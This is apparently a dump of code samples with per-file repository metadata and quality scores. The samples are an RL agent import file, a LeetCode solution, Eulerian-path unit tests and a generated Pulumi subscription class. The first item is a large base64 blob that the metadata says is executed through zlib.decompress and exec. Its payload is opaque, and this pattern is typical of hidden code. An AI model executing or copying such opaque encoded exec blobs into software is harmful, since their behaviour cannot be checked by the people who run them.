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")))
```

avg_line_length: 2628.142857 | max_line_length: 18287 | alphanum_fraction: 0.96407

Quality-signal columns (`*_quality_signal`, in schema order):
601, 18397, 29.510815, 0.975042, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.157545, 0.000815, 18397, 6, 18288, 3066.166667, 0.807312, 0.004512, 0, 0, 0, 0.5, 0.996341, 0.996341, 0, 1, 0, 0, 0, 1, 0, true, 0, 0.5, 0, 0.5, 0

Unsuffixed `qsc_*` columns (in schema order):
0, 0, 1, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, null, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0

effective: 0 | hits: 10
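This row is why `qsc_code_cate_encoded_data_quality_signal` is 1: nearly the whole file is a single base64 blob passed through `zlib.decompress` and `exec`. One plausible detector for such content is a scan for long base64-looking runs; this is an assumed heuristic for illustration, not the pipeline's actual rule:

```python
import re

# Assumed heuristic: flag content containing a very long run of
# base64-alphabet characters, as in the exec(zlib.decompress(...)) blob above.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/=]{512,}")

def has_encoded_data(content: str) -> bool:
    return BASE64_RUN.search(content) is not None

print(has_encoded_data("x = 1\n"))                     # False
print(has_encoded_data("blob = '" + "A" * 600 + "'"))  # True
```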

---

| field | value |
|---|---|
| hexsha | 6d3ea224ef1183365efc1586b189691a7d1a5eb1 |
| size | 71 |
| ext | py |
| lang | Python |
| max_stars_repo_path | rl/agents/__init__.py |
| max_stars_repo_name | Luca96/carla-driving-rl-agent |
| max_stars_repo_head_hexsha | 00ae9ec6dc61f82ecd19e96b6c1a5e1903911e62 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 26 |
| max_stars_repo_stars_event_min_datetime | 2021-01-27T21:42:17.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-31T08:46:30.000Z |
| max_issues_repo_path | rl/agents/__init__.py |
| max_issues_repo_name | Martje55555/carla-rl-agent |
| max_issues_repo_head_hexsha | 0d38cc3080cab900f4eaa3cd4735918c5868103a |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 9 |
| max_issues_repo_issues_event_min_datetime | 2021-05-21T14:50:57.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-03-25T17:50:03.000Z |
| max_forks_repo_path | rl/agents/__init__.py |
| max_forks_repo_name | Martje55555/carla-rl-agent |
| max_forks_repo_head_hexsha | 0d38cc3080cab900f4eaa3cd4735918c5868103a |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | 10 |
| max_forks_repo_forks_event_min_datetime | 2021-03-23T14:10:14.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-03-24T17:49:12.000Z |

content:

```python
from rl.agents.agents import Agent
from rl.agents.ppo import PPOAgent
```

avg_line_length: 17.75 | max_line_length: 34 | alphanum_fraction: 0.816901

Quality-signal columns (`*_quality_signal`, in schema order):
12, 71, 4.833333, 0.583333, 0.206897, 0.413793, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.126761, 71, 3, 35, 23.666667, 0.935484, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0, 1, 0, 1, 0

Unsuffixed `qsc_*` columns (in schema order):
1, 0, 0, null, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0

effective: 0 | hits: 7

---

| field | value |
|---|---|
| hexsha | 6d62abbd45f499a688223d42f5ba4fec4c715f0b |
| size | 2320 |
| ext | py |
| lang | Python |
| max_stars_repo_path | leetcode.com/python/325_Maximum_Size_Subarray_Sum_Equals_k.py |
| max_stars_repo_name | vansh-tiwari/coding-interview-gym |
| max_stars_repo_head_hexsha | 68345725dee0007f52b7ea3550adda35ddcf1955 |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | 713 |
| max_stars_repo_stars_event_min_datetime | 2019-11-19T16:11:25.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-31T02:27:52.000Z |
| max_issues_repo_path | leetcode.com/python/325_Maximum_Size_Subarray_Sum_Equals_k.py |
| max_issues_repo_name | arunsank/coding-interview-gym |
| max_issues_repo_head_hexsha | 8131e3a82795707e144fe55d765b6c15bdb97306 |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | 7 |
| max_issues_repo_issues_event_min_datetime | 2020-01-16T17:07:18.000Z |
| max_issues_repo_issues_event_max_datetime | 2021-11-15T18:24:39.000Z |
| max_forks_repo_path | leetcode.com/python/325_Maximum_Size_Subarray_Sum_Equals_k.py |
| max_forks_repo_name | arunsank/coding-interview-gym |
| max_forks_repo_head_hexsha | 8131e3a82795707e144fe55d765b6c15bdb97306 |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | 393 |
| max_forks_repo_forks_event_min_datetime | 2019-11-18T17:55:45.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-03-28T20:26:32.000Z |

content:

```python
from collections import Counter
class Solution(object):
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
# Sliding Window -- No, because the array contains negative number
# Dictionary + prefixSum technique
maxSubarrayLen, currentSum, prefixSum = 0, 0, 0
prefixSumIndexCounter = Counter() # Stores the indexes of the elements not the occurrences
prefixSumIndexCounter[0] = -1
for idx in range(len(nums)):
currentSum += nums[idx] # increment current sum
prefixSum = currentSum - k
if currentSum == k:
maxSubarrayLen = idx + 1
elif prefixSum in prefixSumIndexCounter: # check if there is a prefix subarray we can take out to reach k
currentSubarrayLen = idx - prefixSumIndexCounter[prefixSum]
maxSubarrayLen = max(maxSubarrayLen, currentSubarrayLen)
if currentSum not in prefixSumIndexCounter:
prefixSumIndexCounter[currentSum] = idx
return maxSubarrayLen
class Solution(object):
def maxSubArrayLen(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
# Sliding Window -- No, because the array contains negative number
# Dictionary + prefixSum technique
maxSubarrayLen, currentSum, prefixSum = 0, 0, 0
prefixSumIndexCounter = Counter()
prefixSumIndexCounter[0] = -1
for idx in range(len(nums)):
currentSum += nums[idx] # increment current sum
prefixSum = currentSum - k
if currentSum == k:
maxSubarrayLen = idx + 1
elif prefixSum in prefixSumIndexCounter: # check if there is a prefix subarray we can take out to reach k
currentSubarrayLen = idx - prefixSumIndexCounter[prefixSum]
maxSubarrayLen = max(maxSubarrayLen, currentSubarrayLen)
if currentSum not in prefixSumIndexCounter:
prefixSumIndexCounter[currentSum] = idx
return maxSubarrayLen
sol = Solution()
# nums = [1, -1, 5, -2, 3]
# k = 3
# nums = [-2,-1,2,1]
# k = 1
nums = [1,0,-1]
k = -1
out = sol.maxSubArrayLen(nums, k)
print("Res: ", out)
```

avg_line_length: 37.419355 | max_line_length: 117 | alphanum_fraction: 0.605603

Quality-signal columns (`*_quality_signal`, in schema order):
238, 2320, 5.903361, 0.289916, 0.005694, 0.027046, 0.031317, 0.892527, 0.892527, 0.892527, 0.892527, 0.892527, 0.892527, 0, 0.016949, 0.313362, 2320, 62, 118, 37.419355, 0.865035, 0.246983, 0, 0.842105, 0, 0, 0.003018, 0, 0, 0, 0, 0, 0, 1, 0.052632, false, 0, 0.026316, 0, 0.184211, 0.026316

Unsuffixed `qsc_*` columns (in schema order):
0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

effective: 0 | hits: 7
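For the uncommented input in this sample (`nums = [1, 0, -1]`, `k = -1`) the script prints `Res: 2`: the longest subarray summing to -1 is `[0, -1]`.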

---

| field | value |
|---|---|
| hexsha | 61044ffe3f583cac1c2b0881e84d59cf49ec14bd |
| size | 5168 |
| ext | py |
| lang | Python |
| max_stars_repo_path | graphtheory/eulerian/tests/test_fleury.py |
| max_stars_repo_name | gitter-badger/graphs-dict |
| max_stars_repo_head_hexsha | 2be1a5b140feb050eec799d6cadf6de5eef01745 |
| max_stars_repo_licenses | ["BSD-3-Clause"] |
| max_stars_count | 36 |
| max_stars_repo_stars_event_min_datetime | 2015-09-20T20:55:39.000Z |
| max_stars_repo_stars_event_max_datetime | 2021-09-20T05:49:03.000Z |
| max_issues_repo_path | graphtheory/eulerian/tests/test_fleury.py |
| max_issues_repo_name | gitter-badger/graphs-dict |
| max_issues_repo_head_hexsha | 2be1a5b140feb050eec799d6cadf6de5eef01745 |
| max_issues_repo_licenses | ["BSD-3-Clause"] |
| max_issues_count | 6 |
| max_issues_repo_issues_event_min_datetime | 2016-03-25T21:41:46.000Z |
| max_issues_repo_issues_event_max_datetime | 2020-02-12T03:18:59.000Z |
| max_forks_repo_path | graphtheory/eulerian/tests/test_fleury.py |
| max_forks_repo_name | gitter-badger/graphs-dict |
| max_forks_repo_head_hexsha | 2be1a5b140feb050eec799d6cadf6de5eef01745 |
| max_forks_repo_licenses | ["BSD-3-Clause"] |
| max_forks_count | 9 |
| max_forks_repo_forks_event_min_datetime | 2016-09-12T07:57:27.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-03-21T16:15:39.000Z |

content:

```python
#!/usr/bin/python
import unittest
from graphtheory.structures.edges import Edge
from graphtheory.structures.graphs import Graph
from graphtheory.eulerian.fleury import FleuryDFS # O(V*E)
from graphtheory.eulerian.fleury import FleuryDFSWithEdges # O(V*E)
from graphtheory.eulerian.fleury import FleuryBFS # O(V*E)
from graphtheory.eulerian.fleury import FleuryBFSWithEdges # O(V*E)
# 0 --- 1 2
# | | / |
# | | / |
# | | / |
# 3 --- 4 --- 5
class TestFleuryUndirectedGraph(unittest.TestCase):
def setUp(self):
self.N = 6 # number of nodes
self.G = Graph(self.N, directed=False)
self.nodes = range(self.N)
self.edges = [
Edge(0, 1), Edge(0, 3), Edge(1, 4), Edge(3, 4), Edge(4, 2),
Edge(4, 5), Edge(2, 5)]
for node in self.nodes:
self.G.add_node(node)
for edge in self.edges:
self.G.add_edge(edge)
def test_fleury_dfs(self):
algorithm = FleuryDFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 2, 5, 4, 3, 0]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges) + 1)
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_bfs(self):
algorithm = FleuryBFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 2, 5, 4, 3, 0]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges) + 1)
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_dfs_with_edges(self):
algorithm = FleuryDFSWithEdges(self.G)
algorithm.run(0)
#expected_cycle = [0, 1, 4, 2, 5, 4, 3, 0]
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 2), Edge(2, 5), Edge(5, 4),
Edge(4, 3), Edge(3, 0)]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges))
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_bfs_with_edges(self):
algorithm = FleuryBFSWithEdges(self.G)
algorithm.run(0)
#expected_cycle = [0, 1, 4, 2, 5, 4, 3, 0]
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 2), Edge(2, 5), Edge(5, 4),
Edge(4, 3), Edge(3, 0)]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges))
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_eulerian(self):
self.G.add_edge(Edge(1, 2))
self.assertRaises(ValueError, FleuryDFS, self.G)
self.assertRaises(ValueError, FleuryBFS, self.G)
self.assertRaises(ValueError, FleuryDFSWithEdges, self.G)
self.assertRaises(ValueError, FleuryBFSWithEdges, self.G)
def tearDown(self): pass
# 0 --o 1 2
# o | / o
# | | / |
# | o o |
# 3 o-- 4 --o 5
class TestFleuryDirectedGraph(unittest.TestCase):
def setUp(self):
self.N = 6 # number of nodes
self.G = Graph(self.N, directed=True)
self.nodes = range(self.N)
self.edges = [
Edge(0, 1), Edge(3, 0), Edge(1, 4), Edge(4, 3), Edge(2, 4),
Edge(4, 5), Edge(5, 2)]
for node in self.nodes:
self.G.add_node(node)
for edge in self.edges:
self.G.add_edge(edge)
def test_fleury_dfs(self):
algorithm = FleuryDFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 5, 2, 4, 3, 0]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges) + 1)
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_bfs(self):
algorithm = FleuryBFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 5, 2, 4, 3, 0]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges) + 1)
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_dfs_with_edges(self):
algorithm = FleuryDFSWithEdges(self.G)
algorithm.run(0)
#expected_cycle = [0, 1, 4, 5, 2, 4, 3, 0]
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 5), Edge(5, 2), Edge(2, 4),
Edge(4, 3), Edge(3, 0)]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges))
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_fleury_bfs_with_edges(self):
algorithm = FleuryBFSWithEdges(self.G)
algorithm.run(0)
#expected_cycle = [0, 1, 4, 5, 2, 4, 3, 0]
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 5), Edge(5, 2), Edge(2, 4),
Edge(4, 3), Edge(3, 0)]
self.assertEqual(len(algorithm.eulerian_cycle), len(self.edges))
self.assertEqual(algorithm.eulerian_cycle, expected_cycle)
def test_eulerian(self):
self.G.add_edge(Edge(1, 2))
self.assertRaises(ValueError, FleuryDFS, self.G)
self.assertRaises(ValueError, FleuryBFS, self.G)
self.assertRaises(ValueError, FleuryDFSWithEdges, self.G)
self.assertRaises(ValueError, FleuryBFSWithEdges, self.G)
def tearDown(self): pass
if __name__ == "__main__":
unittest.main()
# EOF
```

avg_line_length: 36.394366 | max_line_length: 76 | alphanum_fraction: 0.602361

Quality-signal columns (`*_quality_signal`, in schema order):
700, 5168, 4.338571, 0.094286, 0.039513, 0.115904, 0.044781, 0.901548, 0.880803, 0.880803, 0.876523, 0.838986, 0.838986, 0, 0.046695, 0.262384, 5168, 141, 77, 36.652482, 0.75, 0.074303, 0, 0.834951, 0, 0, 0.00168, 0, 0, 0, 0, 0, 0.23301, 1, 0.135922, false, 0.019417, 0.067961, 0, 0.223301, 0

Unsuffixed `qsc_*` columns (in schema order):
0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

effective: 0 | hits: 7
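The high duplicate-n-gram signals for this row (`qsc_code_frac_chars_dupe_5grams_quality_signal` ≈ 0.90) are consistent with its structure: the directed and undirected test classes are near-verbatim copies of each other.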

---

| field | value |
|---|---|
| hexsha | b688fe083fdc26c0c6c209804255e82317fad003 |
| size | 40670 |
| ext | py |
| lang | Python |
| max_stars_repo_path | sdk/python/pulumi_google_native/pubsub/v1/subscription.py |
| max_stars_repo_name | AaronFriel/pulumi-google-native |
| max_stars_repo_head_hexsha | 75d1cda425e33d4610348972cd70bddf35f1770d |
| max_stars_repo_licenses | ["Apache-2.0"] |
| max_stars_count | 44 |
| max_stars_repo_stars_event_min_datetime | 2021-04-18T23:00:48.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-02-14T17:43:15.000Z |
| max_issues_repo_path | sdk/python/pulumi_google_native/pubsub/v1/subscription.py |
| max_issues_repo_name | AaronFriel/pulumi-google-native |
| max_issues_repo_head_hexsha | 75d1cda425e33d4610348972cd70bddf35f1770d |
| max_issues_repo_licenses | ["Apache-2.0"] |
| max_issues_count | 354 |
| max_issues_repo_issues_event_min_datetime | 2021-04-16T16:48:39.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-03-31T17:16:39.000Z |
| max_forks_repo_path | sdk/python/pulumi_google_native/pubsub/v1/subscription.py |
| max_forks_repo_name | AaronFriel/pulumi-google-native |
| max_forks_repo_head_hexsha | 75d1cda425e33d4610348972cd70bddf35f1770d |
| max_forks_repo_licenses | ["Apache-2.0"] |
| max_forks_count | 8 |
| max_forks_repo_forks_event_min_datetime | 2021-04-24T17:46:51.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-01-05T10:40:21.000Z |

content:

```python
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SubscriptionArgs', 'Subscription']
@pulumi.input_type
class SubscriptionArgs:
def __init__(__self__, *,
subscription_id: pulumi.Input[str],
topic: pulumi.Input[str],
ack_deadline_seconds: Optional[pulumi.Input[int]] = None,
dead_letter_policy: Optional[pulumi.Input['DeadLetterPolicyArgs']] = None,
detached: Optional[pulumi.Input[bool]] = None,
enable_message_ordering: Optional[pulumi.Input[bool]] = None,
expiration_policy: Optional[pulumi.Input['ExpirationPolicyArgs']] = None,
filter: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
message_retention_duration: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
push_config: Optional[pulumi.Input['PushConfigArgs']] = None,
retain_acked_messages: Optional[pulumi.Input[bool]] = None,
retry_policy: Optional[pulumi.Input['RetryPolicyArgs']] = None):
"""
The set of arguments for constructing a Subscription resource.
:param pulumi.Input[str] topic: The name of the topic from which this subscription is receiving messages. Format is `projects/{project}/topics/{topic}`. The value of this field will be `_deleted-topic_` if the topic has been deleted.
:param pulumi.Input[int] ack_deadline_seconds: The approximate amount of time (on a best-effort basis) Pub/Sub waits for the subscriber to acknowledge receipt before resending the message. In the interval after the message is delivered and before it is acknowledged, it is considered to be *outstanding*. During that time period, the message will not be redelivered (on a best-effort basis). For pull subscriptions, this value is used as the initial value for the ack deadline. To override this value for a given message, call `ModifyAckDeadline` with the corresponding `ack_id` if using non-streaming pull or send the `ack_id` in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The minimum custom deadline you can specify is 10 seconds. The maximum custom deadline you can specify is 600 seconds (10 minutes). If this parameter is 0, a default value of 10 seconds is used. For push delivery, this value is also used to set the request timeout for the call to the push endpoint. If the subscriber never acknowledges the message, the Pub/Sub system will eventually redeliver the message.
        :param pulumi.Input['DeadLetterPolicyArgs'] dead_letter_policy: A policy that specifies the conditions for dead lettering messages in this subscription. If dead_letter_policy is not set, dead lettering is disabled. The Cloud Pub/Sub service account associated with this subscription's parent project (i.e., service-{project_number}@gcp-sa-pubsub.iam.gserviceaccount.com) must have permission to Acknowledge() messages on this subscription.
:param pulumi.Input[bool] detached: Indicates whether the subscription is detached from its topic. Detached subscriptions don't receive messages from their topic and don't retain any backlog. `Pull` and `StreamingPull` requests will return FAILED_PRECONDITION. If the subscription is a push subscription, pushes to the endpoint will not be made.
:param pulumi.Input[bool] enable_message_ordering: If true, messages published with the same `ordering_key` in `PubsubMessage` will be delivered to the subscribers in the order in which they are received by the Pub/Sub system. Otherwise, they may be delivered in any order.
:param pulumi.Input['ExpirationPolicyArgs'] expiration_policy: A policy that specifies the conditions for this subscription's expiration. A subscription is considered active as long as any connected subscriber is successfully consuming messages from the subscription or is issuing operations on the subscription. If `expiration_policy` is not set, a *default policy* with `ttl` of 31 days will be used. The minimum allowed value for `expiration_policy.ttl` is 1 day. If `expiration_policy` is set, but `expiration_policy.ttl` is not set, the subscription never expires.
:param pulumi.Input[str] filter: An expression written in the Pub/Sub [filter language](https://cloud.google.com/pubsub/docs/filtering). If non-empty, then only `PubsubMessage`s whose `attributes` field matches the filter are delivered on this subscription. If empty, then no messages are filtered out.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: See Creating and managing labels.
:param pulumi.Input[str] message_retention_duration: How long to retain unacknowledged messages in the subscription's backlog, from the moment a message is published. If `retain_acked_messages` is true, then this also configures the retention of acknowledged messages, and thus configures how far back in time a `Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or less than 10 minutes.
:param pulumi.Input[str] name: The name of the subscription. It must have the format `"projects/{project}/subscriptions/{subscription}"`. `{subscription}` must start with a letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or percent signs (`%`). It must be between 3 and 255 characters in length, and it must not start with `"goog"`.
:param pulumi.Input['PushConfigArgs'] push_config: If push delivery is used with this subscription, this field is used to configure it. At most one of `pushConfig` and `bigQueryConfig` can be set. If both are empty, then the subscriber will pull and ack messages using API methods.
        :param pulumi.Input[bool] retain_acked_messages: Indicates whether to retain acknowledged messages. If true, then messages are not expunged from the subscription's backlog, even if they are acknowledged, until they fall out of the `message_retention_duration` window. This must be true if you would like to [`Seek` to a timestamp](https://cloud.google.com/pubsub/docs/replay-overview#seek_to_a_time) in the past to replay previously-acknowledged messages.
:param pulumi.Input['RetryPolicyArgs'] retry_policy: A policy that specifies how Pub/Sub retries message delivery for this subscription. If not set, the default retry policy is applied. This generally implies that messages will be retried as soon as possible for healthy subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline exceeded events for a given message.
"""
pulumi.set(__self__, "subscription_id", subscription_id)
pulumi.set(__self__, "topic", topic)
if ack_deadline_seconds is not None:
pulumi.set(__self__, "ack_deadline_seconds", ack_deadline_seconds)
if dead_letter_policy is not None:
pulumi.set(__self__, "dead_letter_policy", dead_letter_policy)
if detached is not None:
pulumi.set(__self__, "detached", detached)
if enable_message_ordering is not None:
pulumi.set(__self__, "enable_message_ordering", enable_message_ordering)
if expiration_policy is not None:
pulumi.set(__self__, "expiration_policy", expiration_policy)
if filter is not None:
pulumi.set(__self__, "filter", filter)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if message_retention_duration is not None:
pulumi.set(__self__, "message_retention_duration", message_retention_duration)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if push_config is not None:
pulumi.set(__self__, "push_config", push_config)
if retain_acked_messages is not None:
pulumi.set(__self__, "retain_acked_messages", retain_acked_messages)
if retry_policy is not None:
pulumi.set(__self__, "retry_policy", retry_policy)
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "subscription_id")
@subscription_id.setter
def subscription_id(self, value: pulumi.Input[str]):
pulumi.set(self, "subscription_id", value)
@property
@pulumi.getter
def topic(self) -> pulumi.Input[str]:
"""
The name of the topic from which this subscription is receiving messages. Format is `projects/{project}/topics/{topic}`. The value of this field will be `_deleted-topic_` if the topic has been deleted.
"""
return pulumi.get(self, "topic")
@topic.setter
def topic(self, value: pulumi.Input[str]):
pulumi.set(self, "topic", value)
@property
@pulumi.getter(name="ackDeadlineSeconds")
def ack_deadline_seconds(self) -> Optional[pulumi.Input[int]]:
"""
The approximate amount of time (on a best-effort basis) Pub/Sub waits for the subscriber to acknowledge receipt before resending the message. In the interval after the message is delivered and before it is acknowledged, it is considered to be *outstanding*. During that time period, the message will not be redelivered (on a best-effort basis). For pull subscriptions, this value is used as the initial value for the ack deadline. To override this value for a given message, call `ModifyAckDeadline` with the corresponding `ack_id` if using non-streaming pull or send the `ack_id` in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The minimum custom deadline you can specify is 10 seconds. The maximum custom deadline you can specify is 600 seconds (10 minutes). If this parameter is 0, a default value of 10 seconds is used. For push delivery, this value is also used to set the request timeout for the call to the push endpoint. If the subscriber never acknowledges the message, the Pub/Sub system will eventually redeliver the message.
"""
